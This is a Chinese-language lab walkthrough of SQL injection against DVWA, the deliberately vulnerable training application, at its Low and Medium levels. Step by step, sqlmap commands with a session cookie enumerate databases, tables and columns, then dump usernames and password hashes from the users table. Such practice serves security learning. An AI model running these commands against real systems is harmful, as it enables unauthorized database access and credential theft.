使用sqlmap的SQL Injection注入
DVWA | SQL Injection(Low,Medium)
sqlmap自动化注入(Low):
召唤sqlmap:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3"
拿到探测到注入漏洞:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dbs
拿到数据库名:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --current-db
拿到当前数据库表:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --tables -D "dvwa"
拿到表结构:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --columns -D "dvwa" -T "users"
拿到users表结构:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dump -D "dvwa" -T "users" -C "user,password"
拿到用户名和密码:
sqlmap自动化注入(Mdeium):
探测注入漏洞:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit"
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dbs
探测当前所在数据库:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --current-db
探测数据库表:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --tables -D "dvwa"
探测user表结构:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --columns -D "dvwa" -T "users"
提取用户名和密码MD5:
sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"